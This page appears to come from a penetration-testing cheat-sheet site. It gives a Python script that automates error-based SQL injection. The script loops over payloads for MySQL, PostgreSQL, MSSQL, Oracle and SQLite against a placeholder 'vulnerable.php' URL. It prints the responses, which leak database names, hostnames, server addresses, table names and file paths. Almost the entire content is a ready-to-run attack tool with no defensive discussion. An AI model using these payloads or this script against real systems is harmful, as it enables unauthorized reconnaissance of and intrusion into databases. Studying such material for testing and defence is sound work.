Python Script

Python Script to Automate the Process

import requests

url = "http://example.com/vulnerable.php"
payloads = [
    # MySQL
    "' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ",
    "' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@hostname), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ",
    # PostgreSQL
    "' AND 1=CAST((SELECT current_database()) AS INT) -- ",
    "' AND 1=CAST((SELECT inet_server_addr()) AS INT) -- ",
    # MSSQL
    "; SELECT 1 WHERE 1=CAST(DB_NAME() AS INT) -- ",
    "; SELECT 1 WHERE 1=CAST(@@servername AS INT) -- ",
    # Oracle
    "' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT ora_database_name FROM dual) AS INT) -- ",
    "' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT SYS_CONTEXT('USERENV', 'HOST') FROM dual) AS INT) -- ",
    # SQLite
    "' AND 1=CAST((SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) AS INT) -- ",
    "' AND 1=CAST((SELECT file FROM pragma_database_list LIMIT 1) AS INT) -- ",
]

for payload in payloads:
    response = requests.get(url, params={"id": payload})
    print(f"Payload: {payload}")
    print(f"Response: {response.text}\n")

PreviousExtract DB Name Using Errors NextWAF Bypass for SQL Injection

Last updated 1 year ago

hashtagPython Script to Automate the Process

Python Script to Automate the Process